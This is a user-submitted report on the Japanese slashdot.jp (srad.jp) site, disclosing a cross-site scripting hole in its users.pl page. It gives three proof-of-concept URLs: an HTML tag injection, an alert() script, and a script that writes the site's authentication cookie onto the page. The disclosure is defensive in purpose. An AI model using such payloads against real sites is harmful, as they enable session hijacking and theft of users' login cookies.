パスワードを忘れた? アカウント作成
779357 submission
セキュリティ

slashdot.jpにクロスサイトスクリプティング脆弱性

タレコミ by TAKAGI, Hiromitsu
TAKAGI, Hiromitsu 曰く、
slashdot.jpにクロスサイトスクリプティング脆弱性を発見したので報告します。
  1. クロスサイトスクリプティング脆弱性の存在確認テスト
    http://srad.jp/users.pl?op=%3CS%3Etest%3C/S%3E
  2. スクリプトを実行させるテスト
    http://srad.jp/users.pl?op=%3CSCRIPT%3Ealert('hello')%3C/SCRIPT%3E
  3. slashdot.jp認証用のcookieデータを画面に表示させるテスト
    http://srad.jp/users.pl?op=%3CSCRIPT%3Edocument.write(unescape(unescape(document.cookie)))%3C/SCRIPT%3E
typodupeerror

開いた括弧は必ず閉じる -- あるプログラマー

読み込み中...